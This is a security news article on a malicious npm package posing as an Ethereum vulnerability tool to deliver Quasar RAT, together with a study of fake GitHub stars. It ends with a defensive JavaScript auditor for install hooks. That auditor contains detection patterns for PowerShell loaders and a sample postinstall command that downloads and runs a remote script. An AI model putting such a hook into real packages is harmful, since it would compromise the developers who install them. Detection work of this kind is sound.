Malicious NPM Package Masquerading as Ethereum Tool Deploys Quasar RAT


Cybersecurity researchers have uncovered a malicious npm package disguised as a tool for detecting vulnerabilities in Ethereum smart contracts. Instead of aiding developers, this package stealthily installs Quasar RAT, an open-source remote access trojan (RAT), on affected systems.


The Malicious Package: ethereumvulncontracthandler

The npm package, named ethereumvulncontracthandler, was published on December 18, 2024, by a user identified as "solidit-dev-416." Despite its dangerous nature, the package remains available for download on the npm registry and has been downloaded 66 times to date.


Upon installation, the package executes a malicious script retrieved from a remote server, silently deploying Quasar RAT on Windows systems. "The malware is heavily obfuscated to evade detection and uses encoding techniques like Base64 and XOR, along with minification," explains Kirill Boychenko, a security researcher at Socket.


How the Attack Works

The attack proceeds as follows:

  1. Obfuscation and Evasion: The malicious code within the package is layered with multiple obfuscation techniques, making analysis challenging.
  2. Environment Checks: The malware avoids execution in sandboxed or virtualized environments.
  3. Payload Delivery: It acts as a loader, fetching a second-stage payload from a remote server (jujuju[.]lat).
  4. PowerShell Commands: The loader then runs PowerShell commands that launch Quasar RAT.
  5. Persistence and C2 Communication: The RAT modifies the Windows Registry to maintain persistence and connects to a command-and-control (C2) server (captchacdn[.]com:7000) to receive further instructions.


Quasar RAT enables threat actors to fully compromise the victim’s machine, allowing them to monitor activities, exfiltrate sensitive data, and control the system remotely.


Quasar RAT: A Persistent Threat

Quasar RAT, originally released on GitHub in July 2014, is a widely used malware tool employed in both cybercrime and cyber-espionage campaigns. Its capabilities include:

  • Keylogging
  • Screen and webcam capture
  • File exfiltration
  • Command execution


"The attackers use the C2 server to manage multiple infected machines, making it possible to build a botnet or conduct targeted surveillance," Boychenko adds.


Fake GitHub Stars: A Growing Cybersecurity Concern

The discovery of this malicious npm package coincides with a surge in fake GitHub stars—a tactic used to artificially inflate the popularity of malware-laced repositories.

A joint study by Socket, Carnegie Mellon University, and North Carolina State University reveals that millions of fake stars are being used to promote malware repositories disguised as pirating tools, cryptocurrency bots, and game cheats.


The Market for Fake Stars

Promoted by services like Baddhi Shop, BuyGitHub, and Twidium, these fake stars are available for purchase, with prices starting at $110 for 1,000 stars. These stars are often employed to falsely enhance repository credibility and attract unsuspecting developers.


Key findings from the study include:

  • 4.5 million fake stars traced to 1.32 million accounts and 22,915 repositories.
  • 60% of fake star accounts exhibit trivial activity patterns, indicating bot-like behavior.
  • Few repositories using fake stars are published on npm or PyPI, and even fewer gain widespread adoption.


The Risk of Misleading Metrics

The research highlights the unreliability of GitHub star counts as indicators of repository quality. "Star counts can easily be inflated with bot accounts or low-reputation users," the researchers noted.

To mitigate these issues, the study suggests GitHub implement a weighted metric for repository popularity based on network centrality and other dimensions.

In response, GitHub stated it actively works to remove fake star accounts and improve platform security.


Key Takeaways for Developers

As the open-source supply chain remains a prime target for attackers, developers must adopt strict security practices, including:


  • Carefully reviewing package metadata before installation.
  • Using tools like Socket, Snyk, or npm audit to detect potential risks.
  • Verifying repository activity for signs of fake engagement.
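The package in this article ran its loader at install time, so the first metadata to review is the manifest's install hooks. The script below is an added example, not code from the article, from Socket, or from the package itself; it flags install-time scripts that show the loader traits described above (remote fetch, PowerShell, hidden window, encoded input, Run-key persistence). The sample manifests and the hostname are constructed placeholders, and the regexes are heuristics, not a substitute for reading the package.

```javascript
// Added example (not the article's or Socket's code): review an npm manifest's
// install-time hooks for loader traits before installing the package.
const INDICATORS = [
  { name: 'remote-fetch',  re: /\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b|https?:\/\//i },
  { name: 'powershell',    re: /\b(powershell(\.exe)?|pwsh)\b/i },
  { name: 'hidden-window', re: /-(w|windowstyle)\s+hidden\b/i },
  { name: 'encoded-input', re: /\b(base64|FromBase64String)\b|-enc(odedcommand)?\b/i },
  { name: 'dynamic-eval',  re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: 'run-key',       re: /CurrentVersion\\+Run\b/i },
  { name: 'runs-local-js', re: /\bnode\s+\S+\.c?js\b/ },   // pointer only: read that file too
];

// npm runs these hooks automatically during `npm install`, so code here executes
// without the developer ever importing the package.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Returns [{ hook, command, indicators: [...] }] for each install hook that matches
// at least one indicator. An empty array means no heuristic tripped, not "clean".
function auditInstallHooks(pkg) {
  const scripts = pkg.scripts || {};
  const hits = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = INDICATORS.filter(i => i.re.test(command)).map(i => i.name);
    if (indicators.length) hits.push({ hook, command, indicators });
  }
  return hits;
}

// Same check on raw package.json text, e.g. fs.readFileSync('package.json', 'utf8').
function auditManifestText(jsonText) {
  return auditInstallHooks(JSON.parse(jsonText));
}

// Constructed sample manifests (made up for this example; the hostname is a
// placeholder, not the indicator named in the article).
const benignPkg = { name: 'native-addon', scripts: { install: 'node-gyp rebuild', test: 'jest' } };
const loaderPkg = {
  name: 'contract-vuln-checker',
  scripts: {
    postinstall: 'powershell -w hidden -c "iwr https://PLACEHOLDER.invalid/stage2.ps1 | iex"',
    test: 'jest',
  },
};

console.log(auditInstallHooks(benignPkg));   // []
console.log(auditInstallHooks(loaderPkg));   // postinstall: remote-fetch, powershell, hidden-window
```

Run it against a downloaded tarball's package.json (`npm pack <name>` fetches it without running hooks) and read any local script the `runs-local-js` pointer names before installing.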


The rise of malicious npm packages and fake GitHub stars underscores the importance of vigilance in open-source software development. Trust metrics like star counts must be supplemented with thorough reviews to ensure the integrity of dependencies.